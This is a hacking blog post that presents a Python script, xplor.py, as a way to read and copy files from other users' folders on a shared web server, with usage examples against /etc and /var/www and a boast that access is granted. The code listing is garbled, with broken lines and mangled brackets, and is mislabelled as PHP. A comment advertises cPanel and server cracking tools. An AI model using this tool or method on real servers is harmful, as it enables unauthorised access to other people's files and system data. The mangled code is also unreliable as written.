Home » » server symlink bypass

server symlink bypass


Part 1

Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
PHP Code:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile
(sourcedestbuffer_size=1024*1024):
    if 
not hasattr(source'read'):
        
source open(source'rb')
    if 
not hasattr(dest'write'):
        
dest open(dest'wb')
    while 
1:
        
copy_buffer source.read(buffer_size)
        if 
copy_buffer:
            
dest.write(copy_buffer)
        else:
            break
    
source.close()
    
dest.close()

if 
__name__=="__main__":
    if 
not len(sys.argv) == and not len(sys.argv) == 2:
        
sys.stdout.write('usage : python ' os.path.basename(sys.argv***91;0***93;) + ' ***91;path to dir/file***93; ***91;path to save file***93;\r\n')
        
sys.stdout.write('ex    : python ' os.path.basename(sys.argv***91;0***93;) + ' /etc\r\n')
        
sys.stdout.write('ex    : python ' os.path.basename(sys.argv***91;0***93;) + ' /etc/issue\r\n')
        
sys.stdout.write('ex    : python ' os.path.basename(sys.argv***91;0***93;) + ' /etc/issue issue_new_copy\r\n')
        
sys.exit(1)
   
    
target sys.argv***91;1***93;.replace("\\","/")
    if 
os.path.isdir(target):
        if 
not target.endswith("/"):
            
target target "/"
        
dir os.listdir(target)
        for 
d in dir:
            
fs ""
            
if os.path.isdir(target d):
                
fs "***91; DIR ***93;"
            
elif os.path.isfile(target d):
                
fs os.path.getsize(target d)
                
fs str(fs)
               
            
sys.stdout.write(fs.rjust(12" ") + " " "\r\n")
    
elif os.path.isfile(target):
        if 
len(sys.argv) == 3:
            
copyfile(targetsys.argv***91;2***93;)
        else:
            
open(target"rb")
            try:
                
byte f.read(1024)
                
sys.stdout.write(byte)
                
sys.stdout.flush()
                while 
byte != "":
                    
byte f.read(1024)
                    
sys.stdout.write(byte)
                    
sys.stdout.flush()
            
finally:
                
f.close()
    else:
        
sys.stdout.write("Can't found file or folder : " target

testing the script python xplor.py

User the tool to view folders where not have any permission to read inside

python xplor.py /var/www/index.php

View the files in no access folder .
python xplor.py /var/www/index.php

copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg

And yeah file it's here

Yeahh fucking access it's granted

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

1 comments:

viewspk said...

how to crack cpanel|how to crack server|how to crack symlink|how to crack shell cpanel
http://bicombusiness.blogspot.com/2016/01/cpanel-cracker.html

Post a Comment

 
Support : Youtube | Google | Facebook
Copyright © 2011. My Hacking Labs - All Rights Reserved
Template Modify by SanJay KuMar
Proudly powered by Blogger
Related Posts Plugin for WordPress, Blogger...